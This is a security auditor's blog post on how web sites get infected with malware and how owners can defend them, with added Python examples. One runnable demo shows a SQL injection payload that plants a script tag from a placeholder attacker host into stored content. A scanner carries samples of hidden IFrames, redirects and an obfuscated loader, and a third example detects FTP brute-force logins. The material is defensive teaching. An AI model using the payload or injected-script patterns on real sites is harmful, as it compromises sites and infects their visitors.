ERE Information Security Auditors

Malware Vectors and Remediation for Web Sites

Monday, October 19th, 2009

In last week's blog I discussed the mitigation steps recommended for end users to protect themselves from malware in general, and from drive-by malware in particular.

This week I will identify some of the most common (popular) technical malware vectors for infecting web sites, and how web site owners can protect their sites.

Technical Malware Vectors

  • SQL Injection Attack – exploits application-layer vulnerabilities (user input pasted into database queries without validation) to read or change data, to inject active code into content the application stores and later serves, or to attack the database directly.
  • JavaScript Injection Attack – active script placed into the pages a site serves. It is frequently the payload of a SQL injection that appends a script tag to stored content, but any unvalidated input or modified site file can carry it. The injected script typically writes a hidden IFrame or loads further active code.
  • IFrame Injection Attack – strings or active code injected into the web page, usually a hidden IFrame that silently loads an attacker's page; often the result of poor input data validation or of tampered site files.
  • Stolen FTP Credentials Attack – FTP credentials for the web site, stolen (for example by malware on an administrator's workstation) or guessed, are used to log in and modify the site's files directly. No application vulnerability is needed.
  • Server Application Code Vulnerabilities – poorly written or not thoroughly tested application code that lets an attacker change what the server serves.
  • Redirect Injection Attack – abuses the redirect function of a web page or web server, or adds one, so that visitors are sent to a web server of the attacker's choice.
  • Malvertising – malicious code delivered through an advertising network, so a site can serve malware and grab user information even when the publisher is doing a good job of securing its own content. The same exposure exists wherever a page carries content the publisher does not control, especially user-generated content.
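To make the first three vectors concrete, here is an added example (my code, not from the original post) of how a single SQL injection becomes site-wide JavaScript injection. It models a profile page whose "signature" field each user may edit and which is displayed publicly; the table, the user names, the attacker's payload and the attacker.invalid host are all constructed for the example. The vulnerable update pastes the input into the SQL text, so one user's edit rewrites every row; the parameterised version confines the edit to that user's own row.

```python
import html
import sqlite3

# Constructed attacker payload. The host uses the reserved .invalid TLD;
# it is a placeholder, not a real malware server.
INJECTED_TAG = '<script src="http://attacker.invalid/m.js"></script>'

# The quote closes the string literal, "WHERE 1=1" widens the UPDATE to
# every row, and "--" comments out the application's own WHERE clause.
PAYLOAD = INJECTED_TAG + "' WHERE 1=1 --"


def setup_db():
    """Constructed sample data: a users table whose signature column is
    shown on the site's public profile pages."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, signature TEXT);
        INSERT INTO users VALUES (1, 'admin',   'Site administrator');
        INSERT INTO users VALUES (2, 'alice',   'Hello from Alice');
        INSERT INTO users VALUES (3, 'mallory', '');
    """)
    return conn


def update_signature_vulnerable(conn, user_id, signature):
    """The input is concatenated into the statement: a quote in the
    signature ends the literal and everything after it runs as SQL."""
    sql = ("UPDATE users SET signature = '" + signature + "'"
           " WHERE id = " + str(int(user_id)))
    conn.execute(sql)
    conn.commit()


def update_signature_safe(conn, user_id, signature):
    """Parameterised query: the driver passes the value separately from
    the statement text, so the input cannot change the statement."""
    conn.execute("UPDATE users SET signature = ? WHERE id = ?",
                 (signature, user_id))
    conn.commit()


def users_with_script(conn):
    """Names of users whose stored signature now carries a <script> tag."""
    rows = conn.execute(
        "SELECT name FROM users WHERE signature LIKE '%<script%' ORDER BY id")
    return [name for (name,) in rows]


def render_profile(conn, user_id):
    """Output encoding is a separate control from parameterisation:
    whatever is stored, escaping it here keeps it from running."""
    name, signature = conn.execute(
        "SELECT name, signature FROM users WHERE id = ?",
        (user_id,)).fetchone()
    return '<h1>%s</h1><p class="sig">%s</p>' % (html.escape(name),
                                                 html.escape(signature))


def run(updater):
    """Mallory (user 3) edits her own signature with the payload; return
    who ended up with the script tag in their signature."""
    conn = setup_db()
    updater(conn, 3, PAYLOAD)
    return users_with_script(conn)


if __name__ == "__main__":
    print("vulnerable:", run(update_signature_vulnerable))  # all three users
    print("safe:      ", run(update_signature_safe))        # only mallory
```

Two separate controls are at work: parameterisation stops the statement's structure from changing, which is what keeps mallory's edit out of the other rows, and output encoding in render_profile stops whatever she did store from executing in a visitor's browser. The second control is the "data input fields" point in the mitigation list below, and it is needed even when every query is parameterised.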

Mitigation Steps for Web Site Owners

  • Incorporate security into application development and database access at the design stage. Do not treat application security as a bolt-on or an afterthought. Put particular emphasis on data input fields.
  • Thoroughly test all data input fields and the validation applied to them. Have all user input fields and user contribution fields audited by internal audit or by a group other than the developers.
  • Update and patch the Java Virtual Machine (JVM) and Java Development Kit (JDK) wherever they are installed.
  • Ensure the integrity of any third party tools used to manage the web site, even seemingly innocuous apps like traffic counters.
  • Constantly look for unauthorized changes in web site code, such as strings that cause URL redirects. Employ tools to identify unauthorized changes in code.
  • Update and patch web server software.
  • Harden the web server platform. Eliminate all unnecessary accounts and privileges, restrict access, and vigilantly monitor the logs for attempted but failed access, attempted unauthorized access, and of course successful unauthorized access.
  • Consider deploying a second layer of anti-malware monitoring and diagnostic technology that is specifically designed for web site security, with the ability to block attack attempts, log attempted and successful attacks, and generate reports and alerts.
  • Identify and remedy all network vulnerabilities in the infrastructure which houses the web site, its platform, and of course its Internet access.
  • Have an impartial set of eyes review all aspects of network security, including architecture (isolation of the web site on a DMZ, etc.), policies and the degree of compliance with them, the security architecture and how effectively it is used, event log monitoring, and, at the risk of repetition, timely and consistent upgrades and patching.
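As an added example of the "look for unauthorized changes" and "third party tools" points above (my code, not the author's), here is a small Python checker that records a hash baseline of the site's files while they are known to be clean, reports anything added, removed or modified since, and scans every file for the kinds of content an injection leaves behind: hidden IFrames, script loaded from off-site hosts, meta-refresh and script redirects, and unescape()-based obfuscation. The file contents, the bad.invalid host and the TRUSTED_HOSTS list are constructed for the example, and the patterns are a starting set, not a complete signature list.

```python
import hashlib
import re
from urllib.parse import urlparse

# Assumed: the host names this site legitimately serves script from.
TRUSTED_HOSTS = {"www.example.com", "example.com"}

# Content commonly found after an injection. Constructed for this example;
# a production scanner carries a longer, maintained list.
CONTENT_PATTERNS = [
    ("hidden iframe", re.compile(
        r"<iframe[^>]*(?:width\s*=\s*['\"]?0\b|height\s*=\s*['\"]?0\b"
        r"|display\s*:\s*none|visibility\s*:\s*hidden)[^>]*>", re.I)),
    ("obfuscated script", re.compile(
        r"(?:eval|document\.write)\s*\(\s*unescape\s*\(", re.I)),
]
# Constructs naming a target URL; the URL is checked against TRUSTED_HOSTS.
URL_PATTERNS = [
    ("off-site script", re.compile(
        r"<script[^>]+src\s*=\s*['\"]([^'\"]+)", re.I)),
    ("meta refresh redirect", re.compile(
        r"<meta[^>]+http-equiv\s*=\s*['\"]?refresh[^>]*?url\s*=\s*['\"]?"
        r"([^'\">\s]+)", re.I)),
    ("script redirect", re.compile(
        r"(?:window|document|top)\.location(?:\.href)?\s*=\s*['\"]([^'\"]+)",
        re.I)),
]


def digest(content: bytes) -> str:
    return hashlib.sha256(content).hexdigest()


def build_baseline(files: dict) -> dict:
    """Hash every file while the site is known to be clean."""
    return {path: digest(content) for path, content in files.items()}


def changed_files(baseline: dict, files: dict) -> dict:
    """Everything added, removed or modified since the baseline."""
    return {
        "added": sorted(set(files) - set(baseline)),
        "removed": sorted(set(baseline) - set(files)),
        "modified": sorted(p for p in files
                           if p in baseline and digest(files[p]) != baseline[p]),
    }


def is_off_site(url: str) -> bool:
    host = urlparse(url.strip()).netloc.lower()
    return bool(host) and host not in TRUSTED_HOSTS  # relative URLs have no host


def scan_content(path: str, content: bytes) -> list:
    """Findings as (path, label, evidence) tuples."""
    text = content.decode("utf-8", errors="replace")
    findings = []
    for label, pattern in CONTENT_PATTERNS:
        for match in pattern.finditer(text):
            findings.append((path, label, match.group(0)[:80]))
    for label, pattern in URL_PATTERNS:
        for match in pattern.finditer(text):
            if is_off_site(match.group(1)):
                findings.append((path, label, match.group(1)))
    return findings


def audit(baseline: dict, files: dict) -> dict:
    """Hashes catch any change, including ones the patterns do not know;
    the patterns catch infections that predate the baseline."""
    findings = []
    for path, content in files.items():
        findings.extend(scan_content(path, content))
    return {"changes": changed_files(baseline, files), "findings": findings}


# Constructed sample site: a clean copy and the same site after infection.
CLEAN_SITE = {
    "index.html": b'<html><head><script src="/js/site.js"></script></head>'
                  b'<body><p>Welcome</p></body></html>',
    "about.html": b'<html><body><p>About us</p></body></html>',
}
INFECTED_SITE = {
    "index.html": CLEAN_SITE["index.html"].replace(
        b"</body>",
        b'<iframe src="http://bad.invalid/x.html" width="0" height="0"></iframe>'
        b'<script src="http://bad.invalid/m.js"></script></body>'),
    "about.html": CLEAN_SITE["about.html"].replace(
        b"<body>",
        b'<head><meta http-equiv="refresh" content="0;url=http://bad.invalid/">'
        b'</head><body>'),
    # A "traffic counter" script the attacker dropped into the site.
    "counter.js": b"document.write(unescape('%3Cscript src=%22http://bad.invalid"
                  b"/m.js%22%3E%3C/script%3E'));",
}

if __name__ == "__main__":
    report = audit(build_baseline(CLEAN_SITE), INFECTED_SITE)
    print("changed:", report["changes"])
    for finding in report["findings"]:
        print("finding:", finding)
```

Run it from cron against the document root (replacing the in-memory dictionaries with a walk of the file system) and treat any non-empty "changes" list that does not line up with a deployment as an incident, whether or not the pattern scan found anything: the attacker's strings will not always match a signature, but a changed hash is a changed file. Keep the baseline somewhere the web server's account cannot write to, or a stolen FTP credential is enough to update it along with the pages.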
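As an added example of the log monitoring point (again my code, not from the original post), here is detection logic for the stolen or guessed FTP credentials vector, run over constructed log lines in the format vsftpd writes. It flags an address that reaches a threshold of failed logins, a successful login from an address that had been failing, and any successful login from an address outside an assumed list of known administrator addresses. The log lines, FAIL_THRESHOLD and KNOWN_ADMIN_IPS are all assumptions for the example.

```python
import re
from collections import defaultdict

# Constructed log lines in vsftpd's log format. Timestamps and addresses are
# made up; 198.51.100.0/24 and 203.0.113.0/24 are documentation ranges.
SAMPLE_LOG = """\
Mon Oct 19 08:01:12 2009 [pid 4101] [webadmin] OK LOGIN: Client "198.51.100.7"
Mon Oct 19 22:14:03 2009 [pid 4188] [webadmin] FAIL LOGIN: Client "203.0.113.5"
Mon Oct 19 22:14:05 2009 [pid 4189] [webadmin] FAIL LOGIN: Client "203.0.113.5"
Mon Oct 19 22:14:07 2009 [pid 4190] [webadmin] FAIL LOGIN: Client "203.0.113.5"
Mon Oct 19 22:14:09 2009 [pid 4191] [webadmin] FAIL LOGIN: Client "203.0.113.5"
Mon Oct 19 22:14:11 2009 [pid 4192] [webadmin] FAIL LOGIN: Client "203.0.113.5"
Mon Oct 19 22:14:13 2009 [pid 4193] [webadmin] FAIL LOGIN: Client "203.0.113.5"
Mon Oct 19 22:14:15 2009 [pid 4194] [webadmin] OK LOGIN: Client "203.0.113.5"
Tue Oct 20 03:40:51 2009 [pid 4377] [webadmin] OK LOGIN: Client "203.0.113.77"
"""

LINE = re.compile(
    r'^(?P<ts>\w{3} \w{3} +\d+ [\d:]+ \d{4}) \[pid \d+\] \[(?P<user>[^\]]+)\] '
    r'(?P<result>OK|FAIL) LOGIN: Client "(?P<ip>[^"]+)"$')

FAIL_THRESHOLD = 5                  # assumed policy value
KNOWN_ADMIN_IPS = {"198.51.100.7"}  # assumed: where site updates normally come from


def parse(log_text):
    """One dict per recognised login line; other lines are ignored."""
    return [m.groupdict() for m in map(LINE.match, log_text.splitlines()) if m]


def analyse(events, threshold=FAIL_THRESHOLD, known_ips=KNOWN_ADMIN_IPS):
    """Alerts as (kind, ip, user, detail) tuples, in log order."""
    failures = defaultdict(int)
    alerts = []
    for e in events:
        ip, user = e["ip"], e["user"]
        if e["result"] == "FAIL":
            failures[ip] += 1
            if failures[ip] == threshold:  # alert once, when the threshold is hit
                alerts.append(("brute force", ip, user,
                               "%d failed logins" % threshold))
            continue
        # A successful login is suspicious if it follows failures from the
        # same address (a guessed password) or comes from an address never
        # used to manage the site (a stolen password).
        if failures[ip]:
            alerts.append(("success after failures", ip, user,
                           "%d failures before success" % failures[ip]))
        if ip not in known_ips:
            alerts.append(("login from unknown address", ip, user, e["ts"]))
    return alerts


if __name__ == "__main__":
    for alert in analyse(parse(SAMPLE_LOG)):
        print(alert)
```

The last line of the sample is the case that matters most for this vector: a clean login, correct password first time, from an address nobody on the team uses. Nothing about the login itself looks wrong, so the only way to catch a stolen credential in the log is to know where legitimate logins come from and alert on everything else. Pairing this with the file integrity check above closes the loop, since a login from an unknown address followed by modified page files is the full picture of the attack.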

Have a secure week.

Regards

Ron Lepofsky, B.A.Sc. (Mech Eng), CISSP

ERE Information Security Auditor

www.ere-security.ca

